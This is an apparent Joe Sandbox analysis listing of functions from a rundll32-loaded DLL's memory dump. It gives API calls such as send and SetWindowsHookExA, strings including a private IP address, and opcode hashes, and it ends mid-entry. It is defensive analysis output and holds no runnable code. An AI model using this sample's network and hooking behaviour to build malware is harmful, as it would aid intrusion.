Function 100203DD Relevance: 7.6, APIs: 5, Instructions: 53stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 10020407
_memset.LIBCMT ref: 10020424
GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
lstrcmpA.KERNEL32(00000000,?), ref: 10020450
SetWindowTextA.USER32(?,?), ref: 1002045C

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
String ID:
API String ID: 289641511-0
Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61

Uniqueness

Uniqueness Score: -1.00%

Function 100329FD Relevance: 7.5, APIs: 5, Instructions: 43threadCOMMON

Download Yara Rule

APIs

Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5

___set_flsgetvalue.LIBCMT ref: 10032A0A

Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158

Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124

__freefls@4.LIBCMT ref: 10032A60

Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D

GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
ExitThread.KERNEL32 ref: 10032A39
GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
String ID:
API String ID: 2731880238-0
Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10012890 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 123COMMON

Download Yara Rule

APIs

Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2

GetWindowLongA.USER32(?,000000F0), ref: 1001295E
SetWindowLongA.USER32 ref: 10012989

Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A

Strings

Message, xrefs: 10012995
192.168.3.85, xrefs: 100129B9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: LongMenuWindow$AppendSystem
String ID: 192.168.3.85$Message
API String ID: 4121476972-856608562
Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54

Uniqueness

Uniqueness Score: -1.00%

Function 10013010 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 108memorynetworkCOMMON

Download Yara Rule

APIs

Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9

Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03

_DebugHeapAllocator.LIBCPMTD ref: 100130B2

Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875

_strcat.LIBCMT ref: 1001310A

Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB

send.WS2_32(?,?,00000064,00000000), ref: 10013195

Strings

: , xrefs: 100130C7

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
String ID: :
API String ID: 16450322-3653984579
Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1001C1A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1

Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
FreeLibrary.KERNEL32(?), ref: 1001C1F4

Strings

HtmlHelpA, xrefs: 1001C1DE
hhctrl.ocx, xrefs: 1001C1C8

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 3274081130-63838506
Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26

Uniqueness

Uniqueness Score: -1.00%

Function 1003CB01 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16

Strings

IsProcessorFeaturePresent, xrefs: 1003CB10
KERNEL32, xrefs: 1003CB01

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356

Uniqueness

Uniqueness Score: -1.00%

Function 100026D0 Relevance: 6.4, APIs: 5, Instructions: 118COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 100026FF
SetLastError.KERNEL32(0000007F), ref: 1000272B

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 10028638 Relevance: 6.3, APIs: 4, Instructions: 309memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10028651
CoTaskMemAlloc.OLE32(?), ref: 1002876F
_memset.LIBCMT ref: 10028791
CoTaskMemFree.OLE32(?), ref: 1002896D

Part of subcall function 100144EC: _malloc.LIBCMT ref: 10014506

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Task$AllocFreeH_prolog3_malloc_memset
String ID:
API String ID: 2459298410-0
Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100294E4 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 100294EB
VariantClear.OLEAUT32(?), ref: 100295AF
CoTaskMemFree.OLE32(?), ref: 1002965C
CoTaskMemFree.OLE32(?), ref: 1002966A

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: FreeTask$ClearH_prolog3Variant
String ID:
API String ID: 365290523-0
Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1002910E Relevance: 6.2, APIs: 4, Instructions: 173windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 1002913F
GetDesktopWindow.USER32 ref: 1002914F
GetWindowRect.USER32 ref: 10029168
GetWindowRect.USER32 ref: 10029174

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Window$Rect$DesktopVisible
String ID:
API String ID: 1055025324-0
Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1002C6D0 Relevance: 6.1, APIs: 4, Instructions: 132timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1002C6E7

Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA

GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
GetFileSize.KERNEL32(?,00000000), ref: 1002C733

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: File$SizeTime_memset_wctomb_s
String ID:
API String ID: 26245289-0
Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001E262 Relevance: 6.1, APIs: 4, Instructions: 103windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 1001E296
SendMessageA.USER32 ref: 1001E2FB
SendMessageA.USER32 ref: 1001E340
SendMessageA.USER32 ref: 1001E369

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1003E161 Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
__isleadbyte_l.LIBCMT ref: 1003E1C5
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51

Uniqueness

Uniqueness Score: -1.00%

Function 10026509 Relevance: 6.1, APIs: 4, Instructions: 91COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10026510

Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205

GetDC.USER32(?), ref: 1002658E
IntersectRect.USER32(?,?,?), ref: 100265C8
CreateRectRgnIndirect.GDI32(?), ref: 100265D2

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
String ID:
API String ID: 3511876931-0
Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 100211EE Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

__msize.LIBCMT ref: 1002127F
__msize.LIBCMT ref: 100212A2
_malloc.LIBCMT ref: 100212BA
_malloc.LIBCMT ref: 100212CF

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: __msize_malloc
String ID:
API String ID: 1288803200-0
Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80

Uniqueness

Uniqueness Score: -1.00%

Function 1002EB37 Relevance: 6.1, APIs: 4, Instructions: 85windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 1002EB3E
PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 1002EBE9

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497600362.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497627055.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497650299.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.497688957.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID: MessagePeek$H_prolog3
String ID:
API String ID: 3998274959-0
Opcode ID: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
Instruction ID: 2a88a428d7565fcf36a03eeacbe685c714d47f328614f3543ed6f1450f80f22a
Opcode Fuzzy Hash: 2a490924581eee8776ba6e67445ffafdb54cb4693ed265a3166e0c844ddbb0bc
Instruction Fuzzy Hash: BE317871A4039AAFDB21DFA4ED85EAE73E8FF04350F51091AB652AA1C1D770AE40CB10

Uniqueness

Uniqueness Score: -1.00%

Function 100160A8 Relevance: 6.1, APIs: 4, Instructions: 76synchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 100160AF

Part of subcall function 10015F7F: GetCurrentThreadId.KERNEL32 ref: 10015F92
Part of subcall function 10015F7F: SetWindowsHookExA.USER32(000000FF,Function_00015DEB,00000000,00000000), ref: 10015FA2

SetEvent.KERNEL32(?,00000060), ref: 1001615C
WaitForSingleObject.KERNEL32(?,000000FF), ref: 10016165
CloseHandle.KERNEL32(?), ref: 1001616C

Memory Dump Source

Source File: 00000009.00000002.497160748.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true

Associated: 00000009.00000002.497152755.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
